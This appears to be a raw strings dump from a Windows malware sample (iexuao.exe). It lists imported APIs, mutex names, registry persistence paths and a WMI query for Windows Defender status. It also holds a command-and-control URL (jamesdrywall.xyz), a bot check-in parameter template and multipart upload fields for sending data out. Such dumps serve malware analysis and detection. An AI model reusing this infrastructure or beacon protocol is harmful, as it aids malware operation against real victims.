USER32 C:\Windows\syswow64\USER32.dll C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iexuao.exe KERNEL32 C:\Windows\syswow64\kernel32.dll VirtualAlloc LoadLibraryA GetProcAddress VirtualProtect KERNEL32.dll ExitProcess GetProcessHeap GetLastError GetModuleHandleA GetTickCount VirtualFree lstrlenW lstrlenA HeapAlloc HeapFree WaitForSingleObject CloseHandle CreateEventA ntdll.dll memcpy memset RtlUnwind NtQueryVirtualMemory _snprintf sprintf strchr strcpy memmove NtCreateKey NtDeleteValueKey RtlInitUnicodeString NtSetValueKey NtQueryInformationToken NtOpenProcessToken NtClose wcstombs _allmul _aulldiv NtQueryInformationProcess _wcsupr _snwprintf RtlNtStatusToDosError wcsrchr mbstowcs RtlImageNtHeader wcschr SHLWAPI.dll StrChrW StrStrA StrStrIW StrChrA StrStrIA StrTrimA PathCombineW StrToIntExA HeapCreate CreateWaitableTimerA CreateEventW GetSystemTimeAsFileTime Sleep CreateWaitableTimerW WaitForMultipleObjects SetWaitableTimer CreateMutexW lstrcatW lstrcmpW lstrcpyW OpenProcess InitializeCriticalSection SetEvent SwitchToThread EnterCriticalSection lstrcpyA ExpandEnvironmentStringsW InterlockedIncrement LeaveCriticalSection QueryPerformanceFrequency QueryPerformanceCounter GetComputerNameW InterlockedDecrement ProcessIdToSessionId GetCurrentProcessId ResetEvent GetModuleFileNameW MultiByteToWideChar lstrcatA USER32.dll wsprintfW wsprintfA ADVAPI32.dll OpenProcessToken RegEnumKeyExW GetUserNameW GetSidSubAuthorityCount RegCloseKey GetTokenInformation RegSetValueExW RegCreateKeyW SHELL32.dll ShellExecuteW WS2_32.dll WINHTTP.dll WinHttpQueryHeaders WinHttpReceiveResponse WinHttpSetTimeouts WinHttpQueryDataAvailable WinHttpOpenRequest WinHttpSendRequest WinHttpWriteData WinHttpQueryOption WinHttpCloseHandle WinHttpConnect WinHttpReadData WinHttpSetOption DNSAPI.dll DnsQuery_A DnsFree ole32.dll CoUninitialize CoCreateInstance CoSetProxyBlanket CreateStreamOnHGlobal CoInitializeEx OLEAUT32.dll NTDLL.DLL S-%u-%u S-1-5 -%u -21 -3388679973 -3930757225 -3770151564 -1000 \REGISTRY\USER\%s\%s\ {%08X-%04X-%04X-%04X-%08X%04X} {022B7998-1542-BEE5-32E6-4548B44849D1} \REGISTRY\USER\S-1-5-21-3388679973-3930757225-3770151564-1000\Identities\{022B7998-1542-BEE5-32E6-4548B44849D1} old new current version process thread id identity task disk keyboard monitor class archive drive message link template logic protocol console magic system software word byte timer window scale info char calc map print list section name lib access code guid build warning save load region column row language date day false true screen net info web server client search storage icon desktop mode project media spell work security explorer cache theme solution \\.\pipe\{022B7998-1542-BEE5-32E6-4548B44849D1} %05u 0000198-1542-BEE5-32E6-4548B44849D1} %08X-%04X-%04X-%04X-%08X%04X C3D4178C-1366-22F7-B32E-AFA726D57EDB Local\C3D4178C-1366-22F7-B32E-AFA726D57EDB 0AB51D07-5B88-3AFE-0EA1-26B1B372042D Local\0AB51D07-5B88-3AFE-0EA1-26B1B372042D 71839DCA-3134-54D3-0FBE-288DDB014537 Local\71839DCA-3134-54D3-0FBE-288DDB014537 IEXUAO.EXE Mozilla/5.0 (Windows NT %u.%u%s; Trident/7.0; rv:11.0) like Gecko Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko index.html 10 201910301 12 60 newdz鹼㫳茡ꮞ꣭꠻忈䷔ꖈ date ZWnFGQIMBs7ki14C https://jamesdrywall.xyz index.htm 5p5NrGJn0jS HALPmcxz XDUWTFONO root\securitycenter2 WQL select * from antispywareproduct displayname Windows Defender pathtosignedproductexe %ProgramFiles%\Windows Defender\MSASCui.exe productstate Name="%s", State=0x%x, Enabled=%u, Updated=%u, Path="%s" Name="Windows Defender", State=0x61110, Enabled=1, Updated=1, Path="%ProgramFiles%\Windows Defender\MSASCui.exe" SetDWORDValue hDefKey sSubKeyName SOFTWARE\Microsoft\Internet Explorer\Main sValueName IE10RunOnceLastShown uValue ReturnValue SetBinaryValue IE10RunOnceLastShown_TIMESTAMP IE8RunOnceLastShown IE8RunOnceLastShown_TIMESTAMP SetStringValue Check_Associations no http:// jamesdrywall.xyz type=%u&soft=%u&version=%u&user=%08x%08x%08x%08x&group=%u&id=%08x&arc=%u&crc=%08x&uptime=%u type=1&soft=3&version=300794&user=2c896626bd8d8a8532e64548597fff76&group=201910301&id=00000024&arc=0&crc=00000000&uptime=185 %s=%s& vppyn=octx&type=1&soft=3&version=300794&user=2c896626bd8d8a8532e64548597fff76&group=201910301&id=00000024&arc=0&crc=00000000&uptime=185 Zw145n3A9nTQJBBkGb2nmX7u0xXEn5nLqHBpIHOD2QBd0TGWnBSGrTcc4AmAWJgjsljpzLLeS6EZFEuE1UZ6IOdCnrNRHaO+ZRoQHkWMRxfgp8/OlWqXWGZ+tGd9ljUtUsma39gkUQw3IlIlAkclkKmjuQ1VInoKuJVelYovRLYpFE2UIiaIJo7sSawLjqsr = %c%02X _2B _2F Zw145n3A9nTQJBBkGb2nmX7u0xXEn5nLqHBpIHOD2QBd0TGWnBSGrTcc4AmAWJgjsljpzLLeS6EZFEuE1UZ6IOdCnrNRHaO_2BZRoQHkWMRxfgp8_2FOlWqXWGZ_2BtGd9ljUtUsma39gkUQw3IlIlAkclkKmjuQ1VInoKuJVelYovRLYpFE2UIiaIJo7sSawLjqsr Zw145n3A9nT/QJBBkGb2nmX7u0xXEn5nLqH/BpIHOD2QBd0TG/WnBSGrTcc4AmAWJ/gjsljpzLLeS/6EZFEuE1UZ6IOd/CnrNRHaO_2BZRoQHkWMRxfg/p8_2FOlWqXWGZ_2BtGd/9ljUtUsma39g/kUQw3IlIlA/kclkKmjuQ1VInoKuJVelYo/vRLYpFE2UIiaIJo7sSaw/Ljqsr Content-Disposition: form-data; name="%s" Content-Disposition: form-data; name="ebld" ; filename="%s" %s ; filename="rbn" Content-Type: application/octet-stream %04x%04x f4656a8ffe29edbd Content-Disposition: form-data; name="tpkmooyp"; filename="rbn" Content-Type: application/octet-stream Content-Type: multipart/form-data; boundary=%s Content-Type: multipart/form-data; boundary=f4656a8ffe29edbd --%s %s --f4656a8ffe29edbd Content-Disposition: form-data; name="ebld" --f4656a8ffe29edbd Content-Disposition: form-data; name="tpkmooyp"; filename="rbn" Content-Type: application/octet-stream --%s-- --f4656a8ffe29edbd-- // https:// %S https://jamesdrywall.xyz/index.htm